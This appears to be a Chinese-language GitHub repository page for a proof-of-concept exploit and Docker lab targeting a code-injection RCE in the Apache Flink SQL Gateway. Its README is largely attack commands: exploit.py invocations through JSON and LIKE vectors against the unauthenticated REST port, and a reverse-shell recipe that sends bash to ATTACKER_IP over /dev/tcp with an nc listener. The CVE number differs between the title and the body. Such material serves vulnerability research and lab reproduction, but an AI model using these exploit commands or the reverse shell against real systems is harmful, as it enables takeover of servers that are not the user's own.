DexSemon/CVE-2026-25194
GitHub: DexSemon/CVE-2026-25194
针对 Apache Flink SQL Gateway 远程代码执行漏洞(CVE-2026-35194)的 PoC 利用脚本与 Docker 漏洞复现环境。
Stars: 0 | Forks: 0
# CVE-2026-35194 — Apache Flink SQL 代码注入
通过 SQL 代码生成注入,在 Apache Flink TaskManagers 上实现远程代码执行。
| | |
|---|---|
| **CVE** | CVE-2026-35194 |
| **CVSS** | 8.1(高危) |
| **CWE** | CWE-94 — 代码注入 |
| **受影响版本** | Flink 1.15.0 – 1.20.3 / 2.0.0 – 2.2.0 |
| **已修复版本** | 1.20.4 / 2.0.2 / 2.1.2 / 2.2.1 |
| **攻击面** | SQL Gateway REST API(默认端口 8083,无认证) |
## 快速开始
### 1. 部署漏洞环境
```
docker compose up -d
```
等待约 30 秒集群启动。将启动两个服务:
- **Flink Web UI** — `http://localhost:8081`
- **SQL Gateway REST API** — `http://localhost:8083`
验证:
```
curl -s http://localhost:8083/v1/info
# 应该返回版本 "1.20.3"
```
### 2. 安装依赖
```
pip install requests
```
### 3. 漏洞利用
**JSON 向量:**
```
python3 exploit.py localhost -p 8083 -v json -c "id > /tmp/pwned"
```
**LIKE 向量:**
```
python3 exploit.py localhost -p 8083 -v like -c "id > /tmp/pwned"
```
**仅版本检查(无 RCE):**
```
python3 exploit.py localhost -p 8083 --check-only
```
**在 TaskManager 上验证 RCE:**
```
docker exec flink-taskmanager cat /tmp/pwned
```
### 4. 反弹 Shell
```
# Terminal 1 — 监听器
nc -lvnp 4444
# Terminal 2 — exploit
python3 exploit.py TARGET -p 8083 -v json \
-c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"
```
## 用法
```
usage: exploit.py [-h] [-p PORT] [-c COMMAND] [-v {json,like}]
[--check-only] [-t TIMEOUT] [--cert CERT] [--key KEY] [--ssl]
target
Options:
target Target host (IP or hostname)
-p, --port SQL Gateway port (default: 8083)
-c, --command Shell command to run on TaskManager
-v, --vector json (default) or like
--check-only Version check only, no exploit
-t, --timeout Request timeout in seconds (default: 30)
--cert / --key Client cert + key for mTLS environments
--ssl Force HTTPS
```
## 免责声明
仅用于授权的安全研究和教育目的。
标签:Apache Flink, CISA项目, 代码规范检查, 安全靶场, 版权保护, 编程工具, 请求拦截, 远程代码执行, 逆向工具